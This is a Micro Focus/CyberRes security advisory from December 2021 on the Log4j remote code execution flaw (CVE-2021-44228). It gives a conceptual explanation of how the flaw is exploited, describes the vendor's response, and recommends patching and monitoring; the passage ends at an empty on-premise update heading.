December 13, 2021
Micro Focus is continuing to analyze the remote code execution vulnerability (CVE-2021-44228) that has been identified in the Apache Log4j tool used in many Java-based applications. As we, along with many others in the industry, continue to identify and understand the full impact of this vulnerability, we will make that information available to our customers, in addition to information on mitigation until a patch or release is available.
Micro Focus’ Security teams have been actively investigating this issue since the disclosure, firstly to assess the scope of the vulnerability across our portfolio and software versions and then to devise a suitable mitigation plan for each of our products/versions that are determined to be affected. We have the indicators of compromise and are working with the Cybersecurity Infrastructure and Security Agency to stay current with changes to this situation. We have had no alerts on possible Log4J intrusions.
Micro Focus is following guidance from the Cybersecurity and Infrastructure Security Agency (CISA) and National Cyber Security Centre (NCSC) on this issue. Micro Focus implements a Secure Development Lifecycle that includes Supply Chain Security, 3rd Party Component Manifest, and 3rd Party Component Monitoring.
Impact to CyberRes products and remediation details
The vulnerability is a remote code execution vulnerability that can allow an unauthenticated attacker to gain complete access to a target system. It can be triggered when a specially crafted string is parsed and processed by the vulnerable Log4j2 component. This could happen through any user provided input.
Successful exploitation allows for arbitrary code execution in the targeted application. Attackers do not need prior access to the system to log the string and can remotely cause the logging event by using commands such as curl against a target system to log the malicious string in the application log. When processing the log, the vulnerable system reads the string and executes it, which in current attacks is used to execute the code from the malicious domain. Doing so can grant the attacker full access and control of the affected application.
Given the fact that logging code and functionalities in applications and services are typically designed to process a variety of external input data coming from upper layers and from many possible vectors, the biggest risk factor of this vulnerability is predicting whether an application has a viable attack vector path that will allow the malformed exploit string to reach the vulnerable Log4j2 code and trigger the attack.
A common pattern of exploitation risk, for example, is a web application with code designed to process usernames, referrer, or user-agent strings in logs. These strings are provided as external input (e.g., a web app built with Apache Struts). An attacker can send a malformed username or set user-agent with the crafted exploit string hoping that this external input will be processed at some point by the vulnerable Log4j2 code and trigger code execution.
CyberRes client recommendations
- Apply the latest security updates to remediate this vulnerability. Please review the Apache CVE and the Apache security advisory for further details: https://logging.apache.org/log4j/2.x/security.html and https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228
- Monitor Micro Focus Security bulletins
- Monitor for vendor patches as they become available within your environment
CyberRes SaaS Update
CyberRes is aware of the recently disclosed security issue related to the open-source Apache "Log4j2" utility (CVE-2021-44228). We are actively monitoring for this issue and have implemented additional protective and detective controls in all CyberRes SaaS environments.
CyberRes On-Premise Update
